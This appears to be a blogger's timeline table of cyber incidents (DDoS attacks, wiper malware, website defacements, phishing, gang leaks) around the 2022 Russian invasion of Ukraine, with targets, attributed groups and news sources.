Disinformation, false flags, DDoS attacks, and destructive wiper malware are a part of Russian military doctrine.”
Rick Holland, Digital Shadows CISO, 2022
A timeline in the build up to, and during the Russian invasion of Ukraine to keep track of and stay on top of cyber incidents. Dates of gathered intel are in AEDT+11.
I’ve decided to extend this list to include all cyber activity. I’ll be focusing on additional data from 26 Feb onwards.
Will continue to update with new information.
| Date (AEST) | Target Country | Sector | Organisation | Description | Group | Sources |
|---|---|---|---|---|---|---|
| 13 Jan | Ukraine* | Govt Private Infrastructure** | Multiple govt Non-profit IT organisations Kitsoft | Destructive malware, HermeticaWiper, from the Whispergate family, used to destroy files, disguised as ransomware. Data exfiltration, credentials, shell access to certain govt sites observed based on dark web posts selling these assets. | DEV-0586 / Gamaredon | Microsoft Security Week |
| 14 Jan | Ukraine | Govt Private | Ministry of Foreign Affairs Ministry of Education and Science ~70 sites | Defaced websites using OctoberCMS [CVE-2021-32648] | DEV-0586 | The Guardian |
| 19 Jan | Ukraine | Govt | Undisclosed | Attempts to test malware and recycle historical techniques involving VNC. | Gamaredon | Palo Alto |
| 19 Jan | Canada | Govt | Global Affairs Canada | Unknown incident, investigation ongoing. Non-critical internet and internet-based services taken down as part of mitigation. | Not known | CBC |
| 15 Feb | Ukraine | Govt Finance | Ministry of Defence Privatbank Oschadbank Diya Portal | DDOS for 2 hours | Russian Main Intelligence Directorate (GRU) | NPR NSDC Ukraine |
| 15 Feb | Ukraine | Civilians | Civilians | Fake text messages sent to civilians claiming ATMs have gone offline (debunked). Resulted in mass panic withdrawal. | Not known | Twitter / NPR |
| 18 Feb | – | Govt Infrastructure | Strategic enterprises Security Defence | Multiple massive DDOS, ongoing | Russian traffic networks | NSDC Ukraine |
| 24 Feb | Ukraine | Govt Finance | Multiple websites Ukraine Defence and Foreign ministries Council of Ministers PrivatBank State Savings Bank & multiple banks | DDOS, Wiper Malware | Multiple | |
| 24 Feb | – | Private | Flightradar24 | DDOS, disrupting service to tracking potential military aircraft | Not known | ZDNet |
| 24 Feb | Donetsk, Ukraine | Private | DPR Denis Pushilin | DDOS conducted on personal website | Not known | TASS |
| 24 Feb | Ukraine | Govt | System of Electronic Interaction of Executive Bodies (SEI EB) | Mass contamination of information resources of public authorities. Documents uploaded to the portal contain malicious executable scripts that download malware (executed primarily by clicking “Enable Editing button within Office apps) | Gamaredon | NSDC Ukraine |
| 25 Feb | Russia | Govt | mil.ru | DDOS on site, credential leak | GhostSec | Treadstone 71 |
| 25 Feb 6pm | Russia | Govt | kremlin.ru duma.gov.ru mil.ru | Self-imposed geofencing, potentially to prevent DDOS 6pm (GMT+2) | – | |
| 25 Feb | Russia | Finance | Sberbank Alfabank | DDOS for 2 hours | Not known | Twitter*** |
| 25 Feb | Russia | Govt Media | rt.com Kremlin.ru en.fas.gov.ru lenta.ru | DDOS | Anonymous | Twitter |
| 25 Feb | Crimea, Ukraine | Govt | IT Infrastructure | DDOS 8:28pm (GMT+2) | Interfax | |
| 25 Feb | European cluster | Private | Multiple Telegram channels | Overloading Telegram infrastructure resulting in intermittent short-term outages. Multiple Telegram channels experiencing a spike in subscribers, notably bots flooding in (i.e. bot attacks). e.g. political gossip channel Nezygar.Brief forced to remove its short link to prevent further flooding and potential ban (Telegram policy) | – | Pavel Durov Telegram |
| 26 Feb | – | Gang | Conti | Conti releases statement announcing full support of Russian government | ||
| 26 Feb | Russia | Finance | Sberbank VTB Bank | DDOS | – | |
| 26 Feb | Russia | Infrastructure | Russian Railways Roscosmos | DDOS | – | Telegram |
| 26 Feb | Ukraine | Military | Armed Forces personnel | Spearphishing campaign targeting private accounts of armed forces personnel, primarily @i.ua and @meta.ua | UNC1151 | Bleeping Computer |
| 26 Feb | Russia | Infrastructure | Multiple sites | Anonymous to begin targeting various infrastructure, databases, web servers and networks https://anonfiles.com/tfn6obK8x3/RussiaC2Ips_rtf | Anonymous GhostSec | |
| 28 Feb | Russia | Gang | Conti | Ukrainian Conti member hacked the gang’s internal Jabber/XMPP server and leaked conversations | Conti |
* Attack appears to be targeted, targeting a contractor who has offices based in Latvia, and another contractor in Lithuania.
** Ukraine’s Ministry of Foreign Affairs reports that more than 100 of the world’s Fortune 500 companies rely at least partially on Ukrainian IT services, with several Ukrainian IT firms being among the top 100 outsourcing options for IT services globally.
*** Flagging this event as Unverified as there is only one source and Twitter is being used as a platform for disinformation.
All facts and links in this post are represented as accurately as possible given the volatility and influx of information. If there are discrepancies, please contact me and I will update accordingly. All views and opinions expressed are my own.